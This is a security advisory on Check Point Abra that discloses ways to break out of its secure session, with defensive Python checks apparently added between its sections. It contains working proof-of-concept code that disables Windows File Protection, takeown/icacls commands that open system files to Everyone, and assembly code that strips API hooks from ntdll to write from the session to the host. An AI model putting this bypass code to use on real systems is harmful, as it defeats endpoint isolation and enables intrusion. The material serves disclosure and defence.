Checkpoint Abra - Vulnerabilities



Check Point Abra Vulnerabilities

#############################################

Vendor: Check Point Software Technologies Ltd
Product web page: http://rus.checkpoint.com/products/abra/index.html; 
http://www.checkpoint.com/products/go/
Platforms: Windows XP, Vista, 7 (32 bit)
Authors: Belov V., Komarov A. (Group-IB)

#############################################

Summary: Check Point Abra allows you to create a secure virtual workspace on 
any PC, and this solution may significantly change how the work of mobile 
employees is organized. With Abra you can easily turn any PC into a fully 
secure workplace, so you no longer need to carry bulky laptops or heavy 
folders. The convenient USB-drive form factor allows you to quickly create a 
virtual workplace, while the virtualization technology and built-in encryption 
ensure the safety of mobile data. Abra protects users when working offline 
through the encrypted USB drive, and online through the VPN client software.

Description: Imperfect control modules and data monitoring in the application 
allow you to run any file, bypassing the current virtualization policy, to 
read and write data from an isolated Abra session directly into the PC's 
operating system, to conduct phishing attacks, etc.

#############################################################################

Run third-party software in a secure session:

The rules controlling which applications may be used are in the file 
X:\PWC\data\sandbox-persistence.ref (and in X:\PWC\data\swspogo.xml, 
F:\PWC\data\ISWPolicy.xml, X:\PWC\data\ics_policy.xml). Any application not 
on the white list cannot be executed while working in a secure session.

Within the session it is permitted to run the pre-installed software: Internet 
Explorer, Notepad, Calculator, Office, Remote Desktop Connection (plus Portable 
Apps), to use system utilities, and to use the host machines explicitly listed 
in the configuration file F:\PWC\data\sandbox-persistence.ref.

Example:

<Execute OriginalName="calc.exe" PathName="\calc.exe" AppName="Microsoft Calculator" UIDescription="Microsoft Calculator" id="134"/>

The session's Application Control checks an application being run only by its 
path, its file name, and the VersionInfo record in the file.

This implies that an arbitrary application can be imported and run, bypassing 
the application control policy. This is done by changing the file name and the 
OriginalFilename field of the VERSIONINFO resource to those of any white-listed 
application. Moreover, the user may replace any executable file (e.g. the 
WinRAR archiver) in the host OS without importing anything into the secure 
session, and the file will automatically be made available in the secure 
session (run via the file-extension associations, or from the "Start" menu).
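To make the gap concrete, here is an added example (not code from the advisory or from Check Point) that parses an <Execute> entry of the same shape as the one above and evaluates a candidate executable two ways: by file name and VersionInfo OriginalFilename, as the advisory says the product does, and by a content hash pinned in the rule. The sha256 attribute, the executable contents and the helper names are all constructed for this example; the product's policy file has no hash field, which is exactly the gap shown.

```python
import hashlib
import xml.etree.ElementTree as ET

# Constructed stand-ins for executable contents (not real binaries): the
# genuine white-listed program and an arbitrary tool renamed to look like it.
GENUINE_CALC = b"MZ\x90\x00 constructed stand-in for the real calc.exe image"
RENAMED_TOOL = b"MZ\x90\x00 constructed stand-in for some other tool"

# Policy fragment in the shape of the <Execute> entry quoted in the advisory.
# The sha256 attribute is an assumption added for this example.
POLICY_XML = """<Policy>
  <Execute OriginalName="calc.exe" PathName="\\calc.exe"
           AppName="Microsoft Calculator" UIDescription="Microsoft Calculator"
           id="134" sha256="%s"/>
</Policy>""" % hashlib.sha256(GENUINE_CALC).hexdigest()


def load_policy(xml_text):
    """Return the attribute dicts of every <Execute> rule in the policy."""
    return [e.attrib for e in ET.fromstring(xml_text).iter("Execute")]


def name_rule_allows(policy, file_name, versioninfo_original_name):
    """Matching on file name and VERSIONINFO OriginalFilename only, which is
    how the advisory describes the product's check. Anything carrying a
    white-listed name passes, whatever its contents."""
    return any(
        rule["OriginalName"].lower() == file_name.lower()
        and rule["OriginalName"].lower() == versioninfo_original_name.lower()
        for rule in policy
    )


def hash_rule_allows(policy, file_bytes):
    """Content matching: the file must hash to the digest pinned in the rule,
    so renaming it or editing its resources cannot produce a match."""
    digest = hashlib.sha256(file_bytes).hexdigest()
    return any(rule.get("sha256") == digest for rule in policy)


def evaluate(policy, file_name, versioninfo_original_name, file_bytes):
    """Decision of both rule types for one candidate executable."""
    return {
        "name_rule": name_rule_allows(policy, file_name, versioninfo_original_name),
        "hash_rule": hash_rule_allows(policy, file_bytes),
    }


if __name__ == "__main__":
    rules = load_policy(POLICY_XML)
    print("genuine calc.exe:", evaluate(rules, "calc.exe", "calc.exe", GENUINE_CALC))
    print("renamed tool    :", evaluate(rules, "calc.exe", "calc.exe", RENAMED_TOOL))
    print("unlisted name   :", evaluate(rules, "winrar.exe", "winrar.exe", RENAMED_TOOL))
```

The second case is the one the advisory describes: the name rule accepts the renamed tool, the hash rule does not. A signature check on the publisher certificate would serve the same purpose as the pinned digest and survive legitimate updates better.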

It is also possible to substitute the default system software from the 
session's "Start" menu (Internet Explorer, Notepad, Calculator; File Protection 
must be turned off in the host OS, which requires administrator rights). The 
system files can be substituted after disabling Windows File Protection by 
calling the fifth ordinal of the functions exported by sfc_os.dll (Windows XP); 
sample code:

var
  hInst: HMODULE;
  proc: Pointer;
  filename: PWideChar;
begin
  hInst := LoadLibrary('sfc_os.dll');
  proc := GetProcAddress(hInst, PChar(5));   // export looked up by ordinal 5
  filename := 'c:\windows\system32\calc.exe';
  asm
    push -1
    push filename
    push 0
    call proc
  end;
end;

Or by modifying the rights to the file (Vista and above):
takeown /f <file_name>
icacls <file_name> /grant %username%:F
icacls <file_name> /grant *S-1-1-0:(F)
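A defender-side check for the ACL change just shown: the script below, added here and not part of the advisory, parses the icacls output for a system file and flags any ACE that grants write rights to a principal other than TrustedInstaller, SYSTEM or Administrators, which is what the takeown/icacls sequence above leaves behind. The sample output is constructed, and the expected-principal and rights sets are assumptions chosen for this example.

```python
import re

# Constructed icacls output for two files (not captured from a real system).
# icacls prints the path followed by the first ACE, then one ACE per indented
# line; rights are the parenthesised codes after the principal.
ICACLS_CALC = """C:\\Windows\\System32\\calc.exe NT SERVICE\\TrustedInstaller:(F)
                             BUILTIN\\Administrators:(RX)
                             NT AUTHORITY\\SYSTEM:(RX)
                             BUILTIN\\Users:(RX)

Successfully processed 1 files; Failed processing 0 files
"""

ICACLS_NOTEPAD = """C:\\Windows\\System32\\notepad.exe CONTOSO\\alice:(F)
                                BUILTIN\\Administrators:(RX)
                                *S-1-1-0:(F)

Successfully processed 1 files; Failed processing 0 files
"""

# Principals expected to hold write access on files under %SystemRoot%
# (assumption for this example).
TRUSTED_PRINCIPALS = {
    "NT SERVICE\\TrustedInstaller",
    "NT AUTHORITY\\SYSTEM",
    "BUILTIN\\Administrators",
}
# Simple and specific icacls rights codes that allow modifying the file.
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WA", "WEA", "DC", "WDAC", "WO"}

ACE_RE = re.compile(r"^(?P<principal>[^:]+):(?P<rights>(?:\([^)]*\))+)$")


def parse_icacls_output(path, text):
    """Return a list of (principal, {right codes}) for `path`. The first line
    of icacls output is the path followed by the first ACE, so the known path
    is stripped to isolate it; later ACEs are one per indented line."""
    aces = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.lower().startswith(path.lower()):
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if m:
            rights = set(re.findall(r"\(([^)]*)\)", m.group("rights")))
            aces.append((m.group("principal"), rights))
    return aces


def weak_aces(path, text):
    """ACEs that give write access to a principal not expected to have it."""
    return [
        (principal, sorted(rights))
        for principal, rights in parse_icacls_output(path, text)
        if principal not in TRUSTED_PRINCIPALS and rights & WRITE_RIGHTS
    ]


if __name__ == "__main__":
    print(weak_aces("C:\\Windows\\System32\\calc.exe", ICACLS_CALC))
    print(weak_aces("C:\\Windows\\System32\\notepad.exe", ICACLS_NOTEPAD))
```

Running icacls per file and feeding its output to weak_aces over the executables the session's "Start" menu launches gives a quick audit of whether the substitution path described above has been prepared on a host; icacls does not print the owner, so a takeown on its own is not visible here.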

Bat-files downloaded from the host computer's folder called "Downloaded from 
PC", or from any other folder, are also executed without restriction.

The structure of the boot process and the secure session:

A separate process group is created for the secure session. The executable 
files and libraries ship in two builds, 32-bit and 64-bit. Despite this, 
64-bit systems still run a few 32-bit modules from the folder X:\Go\PWC\WoW64.

The ISWMGR.exe process launches a second copy of Explorer (explorer.exe), 
which is the parent of all external tools and imported programs offered in 
the secure session.

Imported files started in a secure session are run through a separate loader 
application, X:\PWC\WOW64\ISWLDR.dat. It in turn loads the library ISWUL.dll 
and calls its InitHook function to install the hooks. Hooks are installed on 
the functions for working with files, the registry, the clipboard, 
cryptography, etc.:

HANDLE (__stdcall *__cdecl GetAddrOf_SetClipboardData())(UINT, HANDLE)
{
  HANDLE (__stdcall *result)(UINT, HANDLE); // eax@1

  result = SetClipboardData;
  addr_SetClipboardData = SetClipboardData;
  return result;
}

int __cdecl hooks_Clipboard()
{
  int v0; // eax@1
  int v1; // eax@3
  int v2; // eax@5
  int v3; // eax@7
  int result; // eax@9

  v0 = splice_func(addr_SetClipboardData, callback_SetClipboardData);
  if ( v0 )
    addr_SetClipboardData = v0;
  v1 = splice_func(addr_GetClipboardData, callback_GetClipboardData);
  if ( v1 )
    addr_GetClipboardData = v1;
  v2 = splice_func(addr_OpenClipboard, callback_OpenClipboard);
  if ( v2 )
    addr_OpenClipboard = v2;
  v3 = splice_func(addr_EmptyClipboard, callback_EmptyClipboard);
  if ( v3 )
    addr_EmptyClipboard = v3;
  result = splice_func(addr_CloseClipboard, callback_CloseClipboard);
  if ( result )
    addr_CloseClipboard = result;
  return result;
}

The hooks can be bypassed by releasing them (restoring the original code of 
the functions as it was before the modification): read the system file, for 
example ntdll.dll, directly from the system folder (before reading, the file 
must be copied to a temporary folder and a structured exception handler 
installed), read the first 10-15 bytes of the function from the file, and 
overwrite the prologue of the corresponding function in memory (where the 
hook's jump is located, for example in ZwLoadDriver) with the bytes that were 
read.

This technique, for example, makes it possible to write changes to the files 
and registry of the secure session directly to the host system.

procedure resolve_APIs_from_dll_images(mapped_dll_base: pointer; dllname: string);
var
  var_4, var_8, var_10, var_20, var_24, var_2C, var_28, var_3C, var_1C,
  dllbase, Src, old: DWORD;
  Dst: array[0..9] of Byte;   // 10-byte prologue copied from the file image
begin
asm
  pushad
   mov     eax, [mapped_dll_base]
   mov     ecx, [eax+3Ch]              // IMAGE_DOS_HEADER.e_lfanew
   mov     edx, [mapped_dll_base]
   lea     eax, [edx+ecx+18h]          // IMAGE_OPTIONAL_HEADER
   mov     [var_10], eax
   mov     ecx, [var_10]
   mov     edx, [mapped_dll_base]
   add     edx, [ecx+60h]              // DataDirectory[0]: export directory
   mov     [var_4], edx
   mov     eax, [var_4]
   mov     ecx, [mapped_dll_base]
   add     ecx, [eax+1Ch]              // AddressOfFunctions
   mov     [var_8], ecx
   mov     ecx, [var_4]
   mov     edx, [mapped_dll_base]
   add     edx, [ecx+20h]              // AddressOfNames
   mov     [var_20], edx
   mov     eax, [var_4]
   mov     ecx, [mapped_dll_base]
   add     ecx, [eax+24h]              // AddressOfNameOrdinals
   mov     [var_2C], ecx
   push    dllname
   call    LoadLibrary                 // base of the hooked copy in memory
   mov     [var_28], eax
   cmp     [var_28], 0
   jne     @loc_41D111
   jmp     @ending
@loc_41D111:
   mov     [var_24], 0                 // export index
   jmp     @loc_41D135
@loc_41D11A:
   mov     eax, [var_24]
   add     eax, 1
   mov     [var_24], eax
   mov     ecx, [var_20]
   add     ecx, 4
   mov     [var_20], ecx
   mov     edx, [var_2C]
   add     edx, 2
   mov     [var_2C], edx
@loc_41D135:
   mov     eax, [var_4]
   mov     ecx, [var_24]
   cmp     ecx, [eax+18h]              // NumberOfNames
   jnb     @ending
   mov     ecx, [var_24]
   mov     edx, [var_20]
   mov     eax, [mapped_dll_base]
   add     eax, [edx]
   mov     ecx, [var_24]
   mov     edx, [var_8]
   mov     eax, [var_28]
   add     eax, [edx+ecx*4]
   mov     [var_3C], eax               // function in the loaded copy
   mov     ecx, [var_24]
   mov     edx, [var_8]
   mov     eax, [mapped_dll_base]
   add     eax, [edx+ecx*4]
   mov     [Src], eax                  // same function in the file image
   push    0Ah
   mov     ecx, [Src]
   push    ecx
   lea     edx, [Dst]
   push    edx
   call    memcpy                      // Dst := 10 bytes from the file image
   add     esp, 0Ch
   lea     eax, [old]
   push    eax
   push    PAGE_EXECUTE_READWRITE
   push    0Ah
   mov     eax, [var_3C]
   push    eax
   call    VirtualProtect              // make the in-memory prologue writable
   push    0Ah
   lea     ecx, [Dst]
   push    ecx
   mov     eax, [var_3C]
   push    eax
   call    memcpy                      // restore the original prologue
   add     esp, 0Ch
   jmp     @loc_41D11A
@ending:
  popad
end;
end;

function UnHook(dllname: string): boolean;
var
  MapOffset: pointer;
  dll, filename: string;
  MapHandle, FileHandle: THandle;
begin
  // SystemDir and GetSpecialPath are helpers not shown in the advisory
  dll := SystemDir + '\' + dllname;
  filename := GetSpecialPath(CSIDL_APPDATA) + '\' + dllname;
  // copy the system DLL to a temporary location and map that copy
  result := CopyFile(PChar(dll), PChar(filename), false);
  if result then
  begin
    FileHandle := CreateFile(PChar(filename), GENERIC_READ, FILE_SHARE_READ, nil,
      OPEN_EXISTING, 0, 0);
    if FileHandle <> INVALID_HANDLE_VALUE then
    try
      // $1000002 = SEC_IMAGE or PAGE_READONLY: map as an image so RVAs apply
      MapHandle := CreateFileMapping(FileHandle, nil, $1000002, 0, 0, nil);
      if MapHandle <> 0 then
      try
        MapOffset := MapViewOfFile(MapHandle, FILE_MAP_READ, 0, 0, 0);
        if MapOffset <> nil then
        try
          resolve_APIs_from_dll_images(MapOffset, dllname);
        finally
          UnmapViewOfFile(MapOffset);
        end;
      finally
        CloseHandle(MapHandle);
      end;
    finally
      CloseHandle(FileHandle);
    end;
    DeleteFile(filename);
  end;
end;

procedure Write2File(filename, s: string);
var
f: textfile;
begin
  assignfile(f, filename);
  rewrite(f);
  writeln(f, s);
  closefile(f);
end;

begin
  UnHook('ntdll.dll');
  ..
  Write2File('c:\users\Administrator\Desktop\POC.txt', 'Now we writing to host OS');
end;

############################################

A phishing attack is also possible by modifying the host system's etc\hosts 
file: all changes to it are automatically applied to the secure session as 
well.
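An added defender-side check for this vector (not part of the advisory): parse a hosts file and report entries that point a watched domain, or any of its subdomains, at anything other than a loopback address. Because the secure session inherits the host's hosts file, this check run on the host covers the session too. The hosts content and the watched domains are constructed for the example.

```python
import ipaddress

# Constructed hosts file content (not taken from a real system). The three
# entries after localhost are the kind of override described above: a
# watched domain is mapped to an address other than its legitimate one.
SAMPLE_HOSTS = """# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
127.0.0.1       localhost
::1             localhost
203.0.113.10    www.example-bank.com example-bank.com  # added override
203.0.113.10    login.example-bank.com
10.0.0.5        intranet.corp.example
"""


def parse_hosts(text):
    """Yield (line_number, ip, hostname) for every mapping in a hosts file,
    ignoring blank lines, comments, and lines whose address is not valid."""
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()   # drop full-line and inline comments
        if not line:
            continue
        fields = line.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # malformed line; not a mapping
        for name in fields[1:]:   # one address may carry several names
            yield lineno, ip, name.lower()


def find_hijacked_entries(text, watched_domains):
    """Entries that map a watched domain (or a subdomain of it) to an address
    other than loopback. Such an entry silently redirects traffic for that
    domain, which is the phishing vector the advisory describes."""
    watched = [d.lower().strip(".") for d in watched_domains]
    findings = []
    for lineno, ip, name in parse_hosts(text):
        if ip.is_loopback:
            continue
        if any(name == d or name.endswith("." + d) for d in watched):
            findings.append({"line": lineno, "host": name, "ip": str(ip)})
    return findings


if __name__ == "__main__":
    for hit in find_hijacked_entries(SAMPLE_HOSTS, ["example-bank.com"]):
        print("line %(line)d: %(host)s -> %(ip)s" % hit)
```

On Windows the file to read is %SystemRoot%\System32\drivers\etc\hosts; a watch list of the organisation's own domains and of the services the session's VPN reaches is the natural input, and a non-empty result on a host that is about to run an Abra session is worth treating as a blocking finding.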